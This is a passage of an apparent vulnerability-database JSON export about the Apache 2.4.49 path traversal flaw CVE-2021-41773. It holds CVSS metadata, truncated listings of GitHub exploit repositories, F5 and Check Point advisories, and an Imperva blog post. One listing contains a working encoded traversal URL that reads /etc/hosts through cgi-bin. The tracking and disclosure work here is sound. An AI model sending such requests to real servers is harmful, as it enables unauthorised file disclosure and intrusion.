"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-25T09:32:45", "id": "3CF66144-235E-5F7A-B889-113C11ABF150", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:16", "description": "# mass_cve-2021-41773\n***MASS CVE-2021-41773***\n## Screenshot\n<i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T15:13:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-09T18:13:59", "id": "68E78C64-D93A-5E8B-9DEA-4A8D826B474E", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# Scanner-CVE-2021-41773\n### A 
automatic scanner to apache 2.4.4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-25T21:34:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-25T22:17:23", "id": "5A54F5DA-F9C1-508B-AD2D-3E45CD647D31", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 scanner\n### This script tests for the path t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T08:32:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": 
"exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:53:24", "id": "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nHello guys, yesterday The new CVE-2021-41773 f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T12:30:13", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:36:13", "id": 
"A6753173-D2DC-54CC-A5C4-0751E61F0343", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-28T22:26:15", "description": "# CVE-2021-41773\nThis is my first time trying to make an explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T04:26:31", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-02-28T17:17:24", "id": "37A9128D-17C4-50FF-B025-5FC3E0F3F338", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-11T07:46:42", "description": "CVE-2021-41773 Playground\n===\n\nThis is a small Docker recipe for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T07:17:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-11T03:05:15", "id": "C068A003-5258-51DC-A3C0-786638A1B69C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 \r\nPath Traversal in Apache HTTP Server 2.4.49\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T16:19:45", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-08T01:15:42", "id": "628A345B-5FD8-5A2F-8782-9125584E4C89", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:03:28", "description": "# cve-2021-41773\nCVE-2021-41773 Path Traversal vulnerability in ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T16:13:38", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-23T16:50:30", "id": "6C0C909F-3307-5755-97D2-0EBD17367154", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "CVE-2021-41773 Playground\n===\n\nThis is a small Docker recipe for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T00:14:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-01T09:04:40", "id": "04E3583E-DFED-5D0D-BCF2-1C1230EB666D", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-25T10:34:43", "description": "# ScaRCE Framework - CVE-2021-41773 Hunter\n[\n## \n\n[![N|Sol...", "cvss3": {}, "published": "2021-10-06T05:22:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T05:24:35", "id": "B8198D62-F9C8-5E03-A301-9A3580070B4C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-nse\n# By George Labrin (@creadpag)\n## \n\n[![N|So...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T05:34:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-15T12:00:37", "id": "ECD5D758-774C-5488-B782-C8996208B401", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 (Apache httpd only 2.4.49)\n\nFor educational pur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T18:56:04", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:37:45", "id": "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-15T07:45:21", "description": "# CVE-2021-41773\nExploitation of CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T20:30:01", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-15T07:22:07", "id": "6E104766-2F7A-5A0A-A24B-61D9B52AD4EE", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:47:39", "description": "# CVE-2021-41773\nCVE-2021-41773 POC with Docker\n\n### 
Configurati...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T02:30:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-12T13:45:57", "id": "4E4BAF15-6430-514A-8679-5B9F03584B71", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:45:12", "description": "https://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts\n\n\n```...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T16:18:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-12T13:45:07", "id": "5D88E443-7AB2-5034-910D-D52A5EFFF5FC", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# POC CVE-2021-41773\n## \n\n[", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-18T00:00:00", "id": "CPAI-2021-0749", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:00", "description": "A remote code execution vulnerability exists in Microsoft Open Management Infrastructure. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Open Management Infrastructure Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-21T00:00:00", "id": "CPAI-2021-0684", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:46:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. 
This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. ([CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>)) \n \nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. ([CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-21T11:53:00", "type": "f5", "title": "Apache HTTP Server vulnerability CVE-2021-41773, CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T11:53:00", "id": "F5:K04082144", "href": "https://support.f5.com/csp/article/K04082144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-10-26T20:35:58", "description": "In late September of 2021, a path traversal and file disclosure vulnerability was disclosed and reported as CVE-2021-41773 in Apache HTTP Server version 2.4.29. Both Windows and Linux servers are affected.\n\nThis vulnerability, which occurs via remote code execution (RCE), exposes a path traversal bug and allows attackers to access and read arbitrary files on the server, including sensitive system files, source code, and more. This unauthorized access could not only leak confidential user data, but could provide the information needed to plan more additional zero-day or ransomware attacks in the future and lead to a full system compromise.\n\nOn October 4th, just days after it was originally reported, Apache released a fix with an update to 2.4.50, and urged users to deploy this patch. However upon further investigation, this patch was found to be insufficient resulting in an additional patch bumping the version number to 2.4.51 on October 7th (CVE-2021-42013). It is unclear whether or not the new patch has fully corrected the vulnerability.\n\nLuckily, enterprises that have [RASP protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) installed on their servers already have protections available that prevent Path Traversal attacks, thereby safeguarding systems from vulnerabilities like CVE-2021-42013 and others like it.\n\nTo verify this protection is enabled in the suite of [RASP security protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>), simply navigate to the RASP Management Console and select the desired configuration file. 
Scroll through the various security protections until reaching the Path Traversal module, then update any settings as desired to adjust the security levels. The updated configuration file can be copied onto the server, and updated protections will be in effect within 60 seconds.\n\nRASP can also be easily installed and configured on additional devices and servers as needed to offer full protection against these vulnerabilities and hackers, as Apache recognizes these vulnerabilities are being actively exploited by bad actors.\n\nFor more information, please contact RASP Technical Support at [support@rasp.imperva.com](<mailto:support@rasp.imperva.com>) or ask for a RASP demo via <https://docs.imperva.com/bundle/rasp-overview/page/73763.htm>\n\nThe post [How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)](<https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {}, "published": "2021-10-26T19:35:24", "type": "impervablog", "title": "How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-26T19:35:24", "id": "IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F", "href": "https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:57:22", "description": "The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in 